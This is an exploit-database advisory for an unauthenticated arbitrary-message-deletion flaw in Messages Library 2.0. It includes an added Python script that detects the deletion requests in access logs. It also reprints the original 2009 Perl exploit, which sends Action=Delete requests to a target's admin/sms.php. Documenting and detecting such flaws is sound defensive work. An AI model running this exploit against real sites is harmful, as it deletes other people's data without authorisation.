Vendor: Messages Library 2.0
By: Stack
CVSS: 7,5 (HIGH)
Title: Arbitrary Delete Message
CWE: 20
Product Name: Messages Library 2.0
Affected Version From: 2.0
Affected Version To: 2.0
Patch Exists: Yes
2009

Messages Library 2.0 <= Arbitrary Delete Message

This exploit allows an attacker to delete arbitrary messages from the Messages Library 2.0 application. The attacker needs to know the ContactID of the message to delete. The exploit sends a POST request to the sms.php file (admin/sms.php in the script below) with the Action parameter set to Delete and the ID parameter set to that ContactID; the script passes both parameters in the URL query string and sends no cookies or credentials with the request.

Mitigation:

Upgrade to the latest version of Messages Library 2.0
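
For installations that cannot be upgraded immediately, the request described above can be looked for in web-server access logs. The following Python is an added detection example, not part of the original entry or of the vendor's code. It assumes the common/combined access-log format and, as a heuristic, that a legitimate administrator requests some other URL under admin/ before deleting a message; the log lines, addresses and the /lib/ install path are constructed.

```python
import re
from urllib.parse import parse_qs, unquote

# Common/combined access-log prefix (assumed format; adapt to your server).
LINE_RE = re.compile(r'(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
                     r'"(?P<method>[A-Z]+) (?P<target>\S+)[^"]*" (?P<status>\d{3})')

def find_delete_requests(lines):
    """Return every Action=Delete call to admin/sms.php found in the log.

    A hit is marked no_prior_admin_activity when the client made no earlier
    request under /admin/ in the same log (heuristic, see lead-in).
    """
    seen_admin = set()  # clients already seen on another admin URL
    hits = []
    for line in lines:
        m = LINE_RE.match(line)
        if not m:
            continue
        # Split by hand: a target such as //admin/sms.php (base URL given with
        # a trailing slash) would be misread as host "admin" by urlsplit().
        raw_path, _, raw_query = m["target"].partition("?")
        path = unquote(raw_path).lower()
        query = {k.lower(): v[0] for k, v in parse_qs(raw_query).items()}
        if path.endswith("/admin/sms.php") and query.get("action", "").lower() == "delete":
            hits.append({"ip": m["ip"], "time": m["ts"], "method": m["method"],
                         "id": query.get("id"), "status": int(m["status"]),
                         "no_prior_admin_activity": m["ip"] not in seen_admin})
        elif "/admin/" in path:
            seen_admin.add(m["ip"])
    return hits

# Constructed sample log lines (documentation addresses, hypothetical /lib/ path).
SAMPLE_LOG = [
    '192.0.2.10 - - [01/Jul/2009:10:00:01 +0000] "GET /lib/admin/ HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [01/Jul/2009:10:00:09 +0000] "GET /lib/admin/sms.php?Action=Delete&ID=4 HTTP/1.1" 200 310 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [01/Jul/2009:10:02:30 +0000] "POST /lib//admin/sms.php?Action=Delete&ID=12 HTTP/1.1" 200 310 "-" "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"',
    '198.51.100.7 - - [01/Jul/2009:10:02:31 +0000] "POST //admin/sms.php?action=delete&id=13 HTTP/1.1" 200 310 "-" "-"',
    '192.0.2.10 - - [01/Jul/2009:10:03:00 +0000] "GET /lib/admin/sms.php HTTP/1.1" 200 900 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    for hit in find_delete_requests(SAMPLE_LOG):
        print(hit)
```

Hits with no_prior_admin_activity set are the ones to review first; deletions made through the admin interface also appear in the result, with the flag cleared.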

Exploit-DB raw data:

#!/usr/bin/perl -w
#  Messages Library 2.0 <=  Arbitrary Delete Message
########################################
#[*] Founded &  Exploited by : Stack
########################################
print "\t\t############################################################\n\n";
print "\t\t#   Messages Library 2.0 <=  Arbitrary Delete Message      #\n\n";
print "\t\t#                          by Stack                        #\n\n";
print "\t\t############################################################\n\n";
use LWP::UserAgent;
die "Example: perl $0 http://victim.com/path/\n" unless @ARGV;
print "\n[!] ContactID : ";
chomp(my $id=<STDIN>);
$b = LWP::UserAgent->new() or die "Could not initialize browser\n";
$b->agent('Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)');
$host = $ARGV[0] . "/admin/sms.php?Action=Delete&ID=".$id."";
$res = $b->request(HTTP::Request->new(POST=>$host));
        print "\nBrought to you by v4-team.com...\n";
        print "\n[+] Message Deleted \n";

# milw0rm.com [2009-07-01]